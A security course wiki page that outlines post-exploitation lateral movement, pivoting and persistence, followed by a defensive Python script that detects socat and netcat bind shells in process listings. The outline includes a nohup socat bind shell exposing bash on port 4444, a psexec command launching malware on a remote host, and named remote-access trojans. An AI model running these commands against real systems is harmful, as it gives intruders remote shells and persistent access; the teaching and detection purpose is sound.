Post Exploitation - Paiet/SEC-335 GitHub Wiki

  • Lateral movement

    • CLI Shell Access
      • RSH/Rlogin
      • Telnet
      • SSH
    • Remote Management Services
      • Blackhat pdf: https://tinyurl.com/gu5zduj
      • RPC/DCOM
      • PsExec
        • Uses SMB to issue commands
        • psexec \\10.0.0.224 -s "C:\malware.exe"
      • Windows Remote Management (WinRM)/WMI
        • wmic /node:10.0.0.224 computersystem get username
      • Scheduled tasks
      • PS remoting/WinRM
        • Invoke-Command -ComputerName 10.0.0.224 -ScriptBlock { Get-ChildItem C:\Windows\System32 }
    • GUI Shell
      • RDP
      • Apple Remote Desktop
      • VNC
        • vncviewer 10.0.0.165
        • Password = "password"
      • X-server forwarding
        • ssh -X 10.0.0.165
        • Run X program
          • xcalc
          • x-www-browser
  • Pivoting

    • Proxychains
  • Persistence

    • Scheduled jobs
    • Scheduled tasks
    • Daemons
      • nohup socat TCP-LISTEN:4444,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane &
    • Back doors
    • Trojan
      • RAT
        • Sub7, DarkComet, TheFatRAT, Pupy
    • New user creation
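A host-side check for the backgrounded socat bind-shell daemon listed under Persistence, added here as an example and not part of the course wiki: it parses `ps -eo pid,ppid,user,args` output (the sample below is constructed, not captured from a real host), flags socat or netcat listeners whose EXEC/-e target is a shell, and notes when the process has been reparented to PID 1, which is what a `nohup … &` launch leaves behind.

```python
import re

# Constructed sample of `ps -eo pid,ppid,user,args` output (assumption: this column order).
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     /sbin/init
  812     1 root     /usr/sbin/sshd -D
 2310     1 www-data socat TCP-LISTEN:4444,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
 2311     1 backup   nc -lvp 5555 -e /bin/sh
 2405   812 alice    socat - TCP:10.0.0.5:80
"""

SHELLS = {"bash", "sh", "zsh", "dash", "ksh", "cmd.exe", "powershell"}
LISTEN_RE = re.compile(r"(?:TCP|TCP4|TCP6|UDP|OPENSSL)-LISTEN:(\d+)", re.I)
EXEC_RE = re.compile(r"(?:EXEC|SYSTEM):([^\s,]+)", re.I)
NC_EXEC_RE = re.compile(r"-[ce]\s+(\S+)")
NC_PORT_RE = re.compile(r"-l\w*\s+(\d+)")

def parse_ps(text):
    """Turn ps output into dicts; the header line is skipped, args keep their spaces."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) == 4:
            pid, ppid, user, args = parts
            rows.append({"pid": int(pid), "ppid": int(ppid), "user": user, "args": args})
    return rows

def is_shell(path):
    return path.rsplit("/", 1)[-1] in SHELLS

def find_bind_shells(rows):
    """Flag listeners that hand the accepted connection to a shell."""
    findings = []
    for r in rows:
        args = r["args"]
        tool = args.split()[0].rsplit("/", 1)[-1]
        port = target = None
        if tool == "socat":
            m_listen, m_exec = LISTEN_RE.search(args), EXEC_RE.search(args)
            if m_listen and m_exec:
                port, target = int(m_listen.group(1)), m_exec.group(1)
        elif tool in ("nc", "ncat", "netcat"):
            m_port, m_exec = NC_PORT_RE.search(args), NC_EXEC_RE.search(args)
            if m_port and m_exec:
                port, target = int(m_port.group(1)), m_exec.group(1)
        if port is not None and is_shell(target):
            # ppid == 1 means the process was orphaned/daemonized (e.g. nohup ... &)
            findings.append({"pid": r["pid"], "user": r["user"], "tool": tool,
                             "port": port, "shell": target, "orphaned": r["ppid"] == 1})
    return findings

if __name__ == "__main__":
    for f in find_bind_shells(parse_ps(SAMPLE_PS)):
        print(f)
```

The client-mode socat entry (PID 2405) is deliberately present and must not be flagged, since only LISTEN plus a shell target marks a bind shell.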